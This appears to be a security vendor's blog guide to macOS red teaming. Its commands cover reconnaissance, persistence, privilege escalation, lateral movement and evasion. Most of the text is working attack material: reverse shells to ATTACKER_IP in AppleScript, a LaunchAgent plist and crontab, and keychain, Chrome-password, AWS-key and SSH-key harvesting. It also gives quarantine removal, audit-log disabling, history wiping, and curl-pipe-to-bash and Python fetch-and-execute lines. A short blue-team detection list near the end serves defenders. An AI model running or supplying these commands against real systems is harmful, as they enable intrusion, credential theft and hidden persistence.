macOS Red Teaming: Techniques, Tools & Attack Tactics

macOS has long carried a reputation for being "more secure" than its counterparts. That reputation has made it a prime target for attackers who know that defenders often under-invest in macOS-specific detection and response capabilities. For red teamers, this creates a rich attack surface with relatively low noise.

This guide walks through the core phases of a macOS red team engagement: reconnaissance, initial access, persistence, privilege escalation, lateral movement, and defense evasion. Every section includes real-world commands and code that reflect what adversaries actually use in the wild.

If your organization needs a structured, expert-led red team assessment tailored to macOS environments, Redfox Cybersecurity offers dedicated adversary simulation services that cover the full attack lifecycle.

macOS Attack Surface Overview

Before executing any techniques, understanding the macOS environment is critical. Modern macOS (Ventura, Sonoma, Sequoia) layers multiple security controls: System Integrity Protection (SIP), Gatekeeper, Transparency Consent and Control (TCC), Endpoint Security Framework, and XProtect. Red teamers must account for each of these.

Key macOS Security Controls Red Teamers Must Understand

• SIP (System Integrity Protection): Prevents modification of protected system paths even with root access.
• TCC: Controls access to sensitive resources like camera, microphone, Full Disk Access, and Contacts.
• Gatekeeper: Enforces code signing and notarization on downloaded binaries.
• AMFI (Apple Mobile File Integrity): Enforces code signing policies at the kernel level.

Understanding what each control blocks, and where gaps exist, defines your operational boundaries before you touch a single endpoint.

Reconnaissance on macOS Targets

Local System Enumeration

Once you have initial access via phishing, a malicious DMG, or a supply chain compromise, the first step is silent enumeration.

# System info
sw_vers
uname -a
hostname
id
whoami

# List all users
dscl . list /Users | grep -v '^_'

# Enumerate groups
dscl . list /Groups

# Check sudo rights
sudo -l

# List running processes
ps aux

# Network connections
netstat -an | grep ESTABLISHED
lsof -i -n -P


[cta]

Credential and Secret Harvesting

macOS stores credentials in the Keychain. Accessing it silently is a high-value objective.

# List all keychain items (requires user context)
security list-keychains
security dump-keychain -d login.keychain

# Find saved Wi-Fi passwords
security find-generic-password -ga "SSID_NAME" 2>&1 | grep "password:"

# Search for hardcoded secrets in common locations
grep -rn "password\|secret\|token\|api_key" ~/Library/Application\ Support/ 2>/dev/null
grep -rn "aws_access_key\|aws_secret" ~/.aws/ ~/.config/ 2>/dev/null

# Extract credentials from browser storage (Chrome)
sqlite3 ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data \
 "SELECT origin_url, username_value, password_value FROM logins;"


[cta]

Initial Access Techniques on macOS

Malicious DMG and Application Bundles

Gatekeeper checks code signatures, but unsigned or ad-hoc signed binaries can still execute if a user bypasses the quarantine warning. Red teamers commonly deliver payloads inside DMG files or .app bundles.

# Remove quarantine attribute from a downloaded binary
xattr -d com.apple.quarantine /path/to/payload.app

# Check quarantine flags
xattr -l /path/to/payload.app

# Ad-hoc sign a binary to bypass some Gatekeeper checks
codesign --force --deep --sign - /path/to/payload.app


[cta]

Office Macro and Script-Based Delivery

While macros are less reliable post-2022 due to Microsoft's changes, AppleScript and JXA (JavaScript for Automation) remain potent delivery vehicles.

-- AppleScript payload example: reverse shell trigger
do shell script "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &"
‍
// JXA equivalent
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &");


[cta]

Persistence Mechanisms on macOS

Persistence is where macOS red teaming diverges most from Windows tradecraft. The mechanisms are different, the paths are different, and the detection opportunities are different.

Launch Agents and Launch Daemons

Launch Agents run in the user context. Launch Daemons run as root at system boot. Both use property list (.plist) files.

<!-- ~/Library/LaunchAgents/com.redfox.persist.plist -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
 "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
 <key>Label</key>
 <string>com.redfox.persist</string>
 <key>ProgramArguments</key>
 <array>
   <string>/bin/bash</string>
   <string>-c</string>
   <string>bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1</string>
 </array>
 <key>RunAtLoad</key>
 <true/>
 <key>KeepAlive</key>
 <true/>
</dict>
</plist>
# Load the agent
launchctl load ~/Library/LaunchAgents/com.redfox.persist.plist

# Verify it loaded
launchctl list | grep redfox


[cta]

Login Items and Background Task Management

macOS Ventura and later introduced Background Task Management, which notifies users of new login items. Older techniques using SMLoginItemSetEnabled or the ServiceManagement framework are still viable for signed applications.

# Add a login item silently via osascript (older macOS)
osascript -e 'tell application "System Events" to make login item at end \
 with properties {path:"/path/to/payload.app", hidden:true}'

# List current login items
osascript -e 'tell application "System Events" to get the name of every login item'


[cta]

Cron Jobs and Periodic Scripts

Cron still works on macOS and is often overlooked in detection rulesets.

# Install a crontab entry
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -

# Verify
crontab -l


[cta]

For organizations looking to test whether their macOS fleet would detect these persistence mechanisms before a real attacker exploits them, Redfox Cybersecurity delivers scenario-based red team engagements that map directly to MITRE ATT&CK for macOS.

Privilege Escalation on macOS

Exploiting Sudo Misconfigurations

# Check what the current user can run as root
sudo -l

# If /usr/bin/python3 is allowed without password:
sudo python3 -c "import os; os.setuid(0); os.system('/bin/bash')"

# If /usr/bin/find is allowed:
sudo find / -name "*.log" -exec /bin/bash \;


[cta]

Abusing SUID Binaries

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Example: if /usr/bin/newgrp is SUID and exploitable
newgrp root


[cta]

TCC Database Manipulation

TCC controls which apps can access sensitive data. The database lives at ~/Library/Application Support/com.apple.TCC/TCC.db. With Full Disk Access, you can read and, in some configurations, modify it.

# Read user TCC database (requires FDA or SIP disabled)
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \
 "SELECT client, service, auth_value FROM access;"

# Check system-level TCC (requires root + SIP disabled)
sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db \
 "SELECT client, service, auth_value FROM access;"


[cta]

Lateral Movement on macOS Networks

SSH Key Abuse

macOS users frequently store SSH keys without passphrases. Once on a host, harvesting these keys enables silent lateral movement across the environment.

# Find SSH keys
find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts

# Use harvested key to pivot
ssh -i /path/to/stolen_key user@TARGET_IP

# SSH agent hijacking (if agent socket is accessible)
SSH_AUTH_SOCK=/tmp/com.apple.ssh-agent.XXXXX ssh user@TARGET_IP


[cta]

Sharing Services Enumeration

macOS frequently runs AFP, SMB, and ARD (Apple Remote Desktop) services in enterprise environments.

# Scan for macOS-specific services on the local network
nmap -sV -p 548,5900,3283,22 192.168.1.0/24

# Connect to an exposed VNC/ARD instance
open vnc://TARGET_IP

# Mount a discovered AFP share
mount -t afp afp://user:password@TARGET_IP/ShareName /mnt/target


[cta]

Defense Evasion on macOS

Disabling and Bypassing Logging

macOS uses Unified Logging via log and oslog. Attackers can suppress or redirect logs during operations.

# Disable audit logging (requires root)
launchctl unload -w /System/Library/LaunchDaemons/com.apple.auditd.plist

# Suppress command history
unset HISTFILE
export HISTSIZE=0

# Clear bash history
history -c && > ~/.bash_history

# Clear zsh history (default shell on modern macOS)
> ~/.zsh_history


[cta]

Living Off the Land with Built-in macOS Binaries

macOS ships with a wide range of binaries useful for offensive operations, often referred to as LOLBins (Living Off the Land Binaries).

# Download a file using curl (pre-installed)
curl -o /tmp/payload http://ATTACKER_IP/payload

# Execute in memory using osascript
osascript -e 'do shell script "curl -s http://ATTACKER_IP/stage2.sh | bash"'

# Encode payload with base64
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" | base64

# Decode and execute
echo "BASE64_PAYLOAD" | base64 -d | bash

# Use Python (still present on many macOS versions)
python3 -c "import urllib.request; exec(urllib.request.urlopen('http://ATTACKER_IP/payload.py').read())"


[cta]

Bypassing Gatekeeper at Scale

In environments with managed devices, red teamers can abuse MDM-enrolled applications or misconfigured allow lists.

# Check MDM enrollment status
profiles status -type enrollment

# List all installed configuration profiles
profiles -P

# Identify MDM server and installed payloads
system_profiler SPConfigurationProfileDataType


[cta]

macOS Red Team Tooling

Several purpose-built frameworks and tools support macOS red team operations:

Mythic C2 with Poseidon Agent: Poseidon is a Go-based macOS agent that supports file operations, shell execution, process injection, and keylogging over an encrypted C2 channel.

Sliver: A cross-platform C2 framework with strong macOS support, including mTLS and HTTP/S listener options.

OPSEC-safe enumeration with SwiftBelt: A Swift-based enumeration tool that runs as a native binary, reducing the footprint left by scripting runtimes.

# Compile and run SwiftBelt
git clone https://github.com/cedowens/SwiftBelt
cd SwiftBelt
swift build -c release
.build/release/SwiftBelt


[cta]

MacC2: A lightweight Python-based C2 specifically for macOS that leverages native APIs and avoids common EDR detection signatures.

Red teamers at Redfox Cybersecurity combine these tools with custom tradecraft to simulate advanced persistent threats targeting macOS-heavy environments, including development teams, creative agencies, and financial services firms.

Detection Opportunities for Blue Teams

Understanding what defenders look for helps red teamers refine their tradecraft, and helps blue teams prioritize coverage.

High-Value Detection Points

• New LaunchAgent or LaunchDaemon plist files created outside of software installation workflows
• Processes spawning from unusual parent-child relationships (e.g., osascript spawning bash)
• Outbound connections from scripting runtimes (python3, osascript, perl) to non-standard ports
• xattr removal of quarantine flags on downloaded files
• Access to the TCC database outside of expected system processes
• Modifications to crontab entries by non-root users
• sudo -l invocations not tied to normal administrator workflows

Key Takeaways

macOS is not inherently more secure in enterprise environments. It runs the same categories of vulnerable software, relies on user trust decisions, and integrates into the same identity and network infrastructure as Windows endpoints. The difference is that macOS-specific detection coverage is thinner in most organizations, and that asymmetry is exactly what skilled red teamers exploit.

The techniques covered here, from LaunchAgent persistence and TCC abuse to SSH key harvesting and LOLBin execution, reflect real-world adversary behavior documented in public threat intelligence. Each technique has a defensive counterpart, and the goal of a red team engagement is to expose the gaps before a real threat actor does.

If your security program needs to validate macOS endpoint controls, test EDR coverage, or simulate a targeted intrusion campaign across a mixed-OS environment, Redfox Cybersecurity provides the technical depth and operational discipline to make that assessment meaningful.